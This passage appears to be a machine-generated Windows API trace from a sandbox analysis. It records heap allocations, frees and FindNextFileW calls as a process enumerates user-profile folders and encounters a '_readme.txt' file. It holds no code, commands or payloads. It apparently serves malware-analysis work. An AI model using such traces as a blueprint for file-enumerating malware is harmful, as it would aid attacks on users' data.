[0173.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5c3e8 | out: hHeap=0x2c0000) returned 1 [0173.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5c758 | out: hHeap=0x2c0000) returned 1 [0173.883] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0173.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3a9fea8 [0173.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3aa00b0 [0173.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3aa0048 [0173.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa00b0 | out: hHeap=0x2c0000) returned 1 [0173.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9fea8 | out: hHeap=0x2c0000) returned 1 [0173.883] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0173.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5c758 [0173.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5c3e8 [0173.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5c1d8 [0173.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5c3e8 | out: hHeap=0x2c0000) returned 1 [0173.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5c758 | out: hHeap=0x2c0000) returned 1 [0173.883] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0173.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5c758 [0173.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5c3e8 [0173.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5cc28 [0173.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5c3e8 | out: hHeap=0x2c0000) returned 1 [0173.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5c758 | out: hHeap=0x2c0000) returned 1 [0173.883] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0173.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3a9fea8 [0173.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3aa00b0 [0173.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x310) returned 0x32b7b8 [0173.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5c758 [0173.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3a9ffe0 [0173.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5c3e8 [0173.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5c548 [0173.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5c860 [0173.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3a9ff78 [0173.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3aa01e8 [0173.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3aa0250 [0173.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5d048 [0173.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3aa02b8 [0173.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3acb1c8 [0173.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3aa0320 [0173.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3acb220 [0173.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3acb278 [0173.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3aa0388 [0173.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3acb2d0 [0173.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3aa03f0 [0173.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3acb328 [0173.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3acb380 [0173.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5cff0 | out: hHeap=0x2c0000) returned 1 [0173.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9fe40 | out: hHeap=0x2c0000) returned 1 [0173.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5d0a0 | out: hHeap=0x2c0000) returned 1 [0173.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5d150 | out: hHeap=0x2c0000) returned 1 [0173.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3acb068 | out: hHeap=0x2c0000) returned 1 [0173.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9fbd0 | out: hHeap=0x2c0000) returned 1 [0173.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9fdd8 | out: hHeap=0x2c0000) returned 1 [0173.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9fd70 | out: hHeap=0x2c0000) returned 1 [0173.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3acb0c0 | out: hHeap=0x2c0000) returned 1 [0173.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa0118 | out: hHeap=0x2c0000) returned 1 [0173.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3acb118 | out: hHeap=0x2c0000) returned 1 [0173.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa0180 | out: hHeap=0x2c0000) returned 1 [0173.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3acb170 | out: hHeap=0x2c0000) returned 1 [0173.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5ce90 | out: hHeap=0x2c0000) returned 1 [0173.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9ff10 | out: hHeap=0x2c0000) returned 1 [0173.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5c6a8 | out: hHeap=0x2c0000) returned 1 [0173.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa0048 | out: hHeap=0x2c0000) returned 1 [0173.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5c1d8 | out: hHeap=0x2c0000) returned 1 [0173.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5cc28 | out: hHeap=0x2c0000) returned 1 [0173.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b598 | out: hHeap=0x2c0000) returned 1 [0173.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3aa0048 [0173.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa00b0 | out: hHeap=0x2c0000) returned 1 [0173.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9fea8 | out: hHeap=0x2c0000) returned 1 [0173.884] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0173.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5cc28 [0173.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x3aa9ca0 [0173.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5cc28 | out: hHeap=0x2c0000) returned 1 [0173.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3a9fea8 [0173.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3aa00b0 [0173.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9fea8 | out: hHeap=0x2c0000) returned 1 [0173.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa9ca0 | out: hHeap=0x2c0000) returned 1 [0173.885] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1c3139e0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1c3139e0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0173.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5cc28 [0173.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5c1d8 [0173.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5c6a8 [0173.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5c1d8 | out: hHeap=0x2c0000) returned 1 [0173.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5cc28 | out: hHeap=0x2c0000) returned 1 [0173.885] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19d49ca0, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x19d49ca0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x19d49ca0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0173.885] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19d49ca0, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x19d49ca0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x19d49ca0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0173.885] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534cd8 | out: hHeap=0x2c0000) returned 1 [0173.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9e108 | out: hHeap=0x2c0000) returned 1 [0173.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534cd8 [0173.885] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534d48 [0173.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534d48 | out: hHeap=0x2c0000) returned 1 [0173.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534d48 [0173.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534d48 | out: hHeap=0x2c0000) returned 1 [0173.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534d48 [0173.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534d48 | out: hHeap=0x2c0000) returned 1 [0173.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534d48 [0173.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534d48 | out: hHeap=0x2c0000) returned 1 [0173.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534cd8 | out: hHeap=0x2c0000) returned 1 [0173.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534cd8 [0173.886] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534d48 [0173.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534d48 | out: hHeap=0x2c0000) returned 1 [0173.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534d48 [0173.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534d48 | out: hHeap=0x2c0000) returned 1 [0173.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534d48 [0173.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534d48 | out: hHeap=0x2c0000) returned 1 [0173.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534d48 [0173.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534d48 | out: hHeap=0x2c0000) returned 1 [0173.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534d48 [0173.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534d48 | out: hHeap=0x2c0000) returned 1 [0173.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534cd8 | out: hHeap=0x2c0000) returned 1 [0173.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534cd8 [0173.886] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534d48 [0173.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534d48 | out: hHeap=0x2c0000) returned 1 [0173.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534d48 [0173.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534d48 | out: hHeap=0x2c0000) returned 1 [0173.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534cd8 | out: hHeap=0x2c0000) returned 1 [0173.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534cd8 [0173.886] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534d48 [0173.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534d48 | out: hHeap=0x2c0000) returned 1 [0173.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534d48 [0173.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534d48 | out: hHeap=0x2c0000) returned 1 [0173.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534d48 [0173.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534d48 | out: hHeap=0x2c0000) returned 1 [0173.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534cd8 | out: hHeap=0x2c0000) returned 1 [0173.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59920 | out: hHeap=0x2c0000) returned 1 [0173.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c68 | out: hHeap=0x2c0000) returned 1 [0173.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a078 | out: hHeap=0x2c0000) returned 1 [0173.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a050 | out: hHeap=0x2c0000) returned 1 [0173.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59ba0 | out: hHeap=0x2c0000) returned 1 [0173.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59f10 | out: hHeap=0x2c0000) returned 1 [0173.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59f88 | out: hHeap=0x2c0000) returned 1 [0173.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59da8 | out: hHeap=0x2c0000) returned 1 [0173.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59b28 | out: hHeap=0x2c0000) returned 1 [0173.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59dd0 | out: hHeap=0x2c0000) returned 1 [0173.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59880 | out: hHeap=0x2c0000) returned 1 [0173.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ac3cc8 | out: hHeap=0x2c0000) returned 1 [0173.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ac3cf0 | out: hHeap=0x2c0000) returned 1 [0173.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ac3d18 | out: hHeap=0x2c0000) returned 1 [0173.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ac3d40 | out: hHeap=0x2c0000) returned 1 [0173.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ac3d68 | out: hHeap=0x2c0000) returned 1 [0173.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ac3d90 | out: hHeap=0x2c0000) returned 1 [0173.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ac3db8 | out: hHeap=0x2c0000) returned 1 [0173.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ac3de0 | out: hHeap=0x2c0000) returned 1 [0173.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ac3e08 | out: hHeap=0x2c0000) returned 1 [0173.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ac3e30 | out: hHeap=0x2c0000) returned 1 [0173.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ac3e58 | out: hHeap=0x2c0000) returned 1 [0173.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9e0c0 | out: hHeap=0x2c0000) returned 1 [0173.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aca110 | out: hHeap=0x2c0000) returned 1 [0173.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aca148 | out: hHeap=0x2c0000) returned 1 [0173.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aca180 | out: hHeap=0x2c0000) returned 1 [0173.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aca0d8 | out: hHeap=0x2c0000) returned 1 [0173.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ac5b20 | out: hHeap=0x2c0000) returned 1 [0173.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5cc28 [0173.888] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5c1d8 [0173.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5c1d8 | out: hHeap=0x2c0000) returned 1 [0173.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5c1d8 [0173.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5c1d8 | out: hHeap=0x2c0000) returned 1 [0173.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5c1d8 [0173.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 